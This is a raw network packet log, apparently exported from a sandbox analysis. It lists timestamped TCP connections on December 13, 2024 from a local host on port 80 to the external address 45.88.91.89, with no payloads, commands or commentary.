                                                      Dec 13, 2024 14:32:51.455820084 CET4979580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:51.575643063 CET804979545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:51.813321114 CET4979580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:51.819943905 CET4979680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:51.933540106 CET804979545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:51.933571100 CET804979545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:51.939778090 CET804979645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:51.939847946 CET4979680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:51.940047979 CET4979680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:52.059746027 CET804979645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:52.297672987 CET4979680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:52.417716980 CET804979645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:52.417728901 CET804979645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:52.417737961 CET804979645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:52.539679050 CET804979545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:52.735060930 CET4979580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:52.777343988 CET804979545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:52.844423056 CET4979580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.025230885 CET804979645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:53.141324043 CET4979680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.261082888 CET804979645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:53.344424963 CET4979680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.391959906 CET4979380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.392047882 CET4979580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.392074108 CET4979680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.392457008 CET4980280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.512227058 CET804979345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:53.512260914 CET804980245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:53.512290001 CET4979380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.512335062 CET4980280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.512461901 CET4980280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.512708902 CET804979545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:53.512758017 CET804979645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:53.512761116 CET4979580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.512814999 CET4979680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.632540941 CET804980245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:53.860172033 CET4980280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:53.980097055 CET804980245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:53.980113029 CET804980245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:53.980123997 CET804980245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:54.614403963 CET804980245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:54.698949099 CET4980280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:54.833034039 CET804980245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:54.988498926 CET4980280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:54.988821030 CET4980780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:55.109699965 CET804980745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:55.109801054 CET804980245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:55.109829903 CET4980780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:55.109868050 CET4980280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:55.110008001 CET4980780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:55.229805946 CET804980745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:55.469564915 CET4980780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:55.589593887 CET804980745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:55.589662075 CET804980745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:55.589694023 CET804980745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:56.300745964 CET804980745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:56.429641962 CET4980780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:56.533082962 CET804980745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:56.625718117 CET4980780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:56.661988974 CET4980780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:56.662482977 CET4981380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:56.782111883 CET804980745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:56.782172918 CET4980780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:56.782247066 CET804981345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:56.782310963 CET4981380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:56.782488108 CET4981380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:56.902395964 CET804981345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:57.141463041 CET4981380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:57.261640072 CET804981345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:57.261682034 CET804981345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:57.261737108 CET804981345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:57.782799006 CET4981580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:57.784925938 CET4981380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:57.902725935 CET804981545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:57.903204918 CET4981580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:57.904215097 CET4981580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:57.905163050 CET804981345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:57.905219078 CET4981380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:57.909080029 CET4981680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:58.024250984 CET804981545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:58.029702902 CET804981645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:58.029772997 CET4981680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:58.030399084 CET4981680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:58.150702000 CET804981645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:58.250763893 CET4981580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:58.372133017 CET804981545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:58.373184919 CET804981545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:58.375778913 CET4981680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:58.495656967 CET804981645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:58.495668888 CET804981645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:58.495680094 CET804981645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:58.989263058 CET804981545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:59.116645098 CET804981645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:59.125713110 CET4981580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:59.229100943 CET804981545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:59.328823090 CET4981580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:59.328911066 CET4981680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:59.351181984 CET804981645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:59.391419888 CET4981680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:59.472065926 CET4981580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:59.472285032 CET4981680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:59.472453117 CET4982280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:59.592369080 CET804982245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:59.592428923 CET804981545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:59.592462063 CET4982280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:59.592494965 CET4981580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:59.592679977 CET4982280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:59.593112946 CET804981645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:59.593259096 CET4981680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:32:59.712385893 CET804982245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:32:59.938399076 CET4982280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:00.060328960 CET804982245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:00.060358047 CET804982245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:00.060450077 CET804982245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:00.678548098 CET804982245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:00.735260010 CET4982280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:00.917119026 CET804982245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:01.047569990 CET4982280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:01.048906088 CET4982280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:01.049488068 CET4982880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:01.169966936 CET804982245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:01.170031071 CET4982280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:01.170335054 CET804982845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:01.170541048 CET4982880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:01.170731068 CET4982880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:01.290503025 CET804982845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:01.516442060 CET4982880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:01.636396885 CET804982845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:01.636423111 CET804982845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:01.636488914 CET804982845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:02.315752029 CET804982845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:02.360078096 CET4982880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:02.564076900 CET804982845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:02.610069036 CET4982880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:03.003606081 CET4982880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:03.004020929 CET4983080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:03.123848915 CET804983045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:03.123924971 CET4983080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:03.123940945 CET804982845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:03.123995066 CET4982880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:03.124161959 CET4983080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:03.243978024 CET804983045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:03.469582081 CET4983080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:03.589703083 CET804983045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:03.589745045 CET804983045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:03.589772940 CET804983045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:04.210403919 CET804983045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:04.235840082 CET4983680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:04.238349915 CET4983080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:04.356000900 CET804983645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:04.356096983 CET4983680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:04.356209993 CET4983680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:04.357256889 CET4983780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:04.358756065 CET804983045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:04.358820915 CET4983080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:04.475883007 CET804983645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:04.477390051 CET804983745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:04.477474928 CET4983780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:04.477627993 CET4983780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:04.597779989 CET804983745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:04.703957081 CET4983680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:04.823967934 CET804983645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:04.823985100 CET804983645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:04.829014063 CET4983780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:04.949048996 CET804983745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:04.949063063 CET804983745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:04.949071884 CET804983745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:05.441090107 CET804983645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:05.485275030 CET4983680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:05.563888073 CET804983745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:05.677130938 CET804983645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:05.719448090 CET4983680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:05.735074043 CET4983780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:05.797722101 CET804983745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:05.844549894 CET4983780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:05.920952082 CET4983780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:05.920955896 CET4983680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:05.921341896 CET4984380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:06.041224957 CET804984345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:06.041271925 CET804983745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:06.041367054 CET4983780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:06.041502953 CET4984380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:06.041651011 CET4984380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:06.041728973 CET804983645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:06.042049885 CET4983680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:06.162158012 CET804984345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:06.391482115 CET4984380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:06.511585951 CET804984345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:06.511605024 CET804984345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:06.511616945 CET804984345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:07.239779949 CET804984345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:07.294384003 CET4984380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:07.473078966 CET804984345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:07.656969070 CET4984380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:07.906443119 CET4984380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:07.906838894 CET4984780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:08.026690960 CET804984745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:08.026765108 CET4984780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:08.026899099 CET804984345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:08.027036905 CET4984780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:08.027065039 CET4984380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:08.146863937 CET804984745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:08.375824928 CET4984780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:08.495853901 CET804984745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:08.495877028 CET804984745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:08.495893955 CET804984745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:09.118302107 CET804984745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:09.235090017 CET4984780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:09.357141972 CET804984745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:09.485016108 CET4984780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:09.485435009 CET4985280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:09.605249882 CET804985245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:09.605376959 CET4985280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:09.605490923 CET804984745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:09.605530024 CET4985280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:09.605549097 CET4984780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:09.725297928 CET804985245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:09.953927040 CET4985280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:10.075342894 CET804985245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:10.075356007 CET804985245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:10.075551033 CET804985245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:10.690319061 CET4985380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:10.721503973 CET4985280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:10.742171049 CET804985245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:10.742238045 CET4985280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:10.810194969 CET804985345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:10.810281038 CET4985380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:10.810444117 CET4985380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:10.841779947 CET804985245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:10.841835976 CET4985280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:10.866231918 CET4985980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:10.930263996 CET804985345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:10.986056089 CET804985945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:10.986124039 CET4985980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:10.986248970 CET4985980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:11.105937004 CET804985945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:11.157072067 CET4985380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:11.277112961 CET804985345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:11.277143002 CET804985345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:11.344594002 CET4985980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:11.464565039 CET804985945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:11.464648008 CET804985945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:11.464663029 CET804985945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:11.897660017 CET804985345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:12.047575951 CET4985380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:12.074239969 CET804985945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:12.133444071 CET804985345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:12.235119104 CET4985980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:12.235291958 CET4985380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:12.403295040 CET804985945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:12.532144070 CET4985980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:12.542615891 CET4985380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:12.542619944 CET4985980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:12.542972088 CET4986280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:12.664362907 CET804986245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:12.664381027 CET804985345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:12.664459944 CET4985380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:12.664474010 CET4986280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:12.664621115 CET4986280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:12.664822102 CET804985945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:12.665046930 CET4985980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:12.784396887 CET804986245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:13.016413927 CET4986280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:13.136543989 CET804986245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:13.136559963 CET804986245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:13.136569023 CET804986245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:13.751754045 CET804986245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:13.845170021 CET4986280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:13.985359907 CET804986245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:14.047583103 CET4986280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:14.107788086 CET4986280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:14.108254910 CET4986880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:14.228004932 CET804986245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:14.228035927 CET804986845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:14.228072882 CET4986280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:14.228141069 CET4986880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:14.228312016 CET4986880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:14.348619938 CET804986845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:14.579169989 CET4986880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:14.699109077 CET804986845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:14.699129105 CET804986845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:14.699172974 CET804986845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:15.313951015 CET804986845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:15.547584057 CET4986880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:15.581617117 CET804986845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:15.708389044 CET4986880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:15.708739042 CET4987480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:15.829677105 CET804987445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:15.829718113 CET804986845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:15.829741955 CET4987480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:15.829812050 CET4986880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:15.829936981 CET4987480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:15.949568987 CET804987445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:16.188282967 CET4987480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:16.308124065 CET804987445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:16.308142900 CET804987445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:16.308182001 CET804987445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:16.916068077 CET804987445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:17.063283920 CET4987480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:17.142112970 CET4987480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:17.142250061 CET4987580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:17.153258085 CET804987445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:17.153359890 CET4987480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:17.262207985 CET804987545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:17.262448072 CET804987445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:17.262552977 CET4987480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:17.262564898 CET4987580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:17.263113022 CET4987580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:17.270045996 CET4987680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:17.383096933 CET804987545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:17.390105009 CET804987645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:17.391506910 CET4987680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:17.392546892 CET4987680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:17.512265921 CET804987645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:17.610434055 CET4987580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:17.730304956 CET804987545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:17.730340958 CET804987545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:17.750782967 CET4987680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:17.870609045 CET804987645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:17.870625019 CET804987645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:17.870732069 CET804987645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:18.351968050 CET804987545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:18.476558924 CET804987645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:18.532042980 CET4987580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:18.532143116 CET4987680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:18.585073948 CET804987545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:18.641340971 CET4987580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:18.709062099 CET804987645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:18.830643892 CET4987580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:18.830705881 CET4987680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:18.831051111 CET4988280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:18.950764894 CET804988245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:18.950778008 CET804987545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:18.950841904 CET4987580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:18.950861931 CET4988280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:18.951000929 CET4988280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:18.951524019 CET804987645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:18.951616049 CET4987680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:19.071393013 CET804988245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:19.297868967 CET4988280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:19.417824030 CET804988245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:19.417841911 CET804988245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:19.417860031 CET804988245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:20.045212030 CET804988245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:20.172614098 CET4988280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:20.318013906 CET804988245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:20.435554981 CET4988280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:20.436080933 CET4988680192.168.2.645.88.91.89
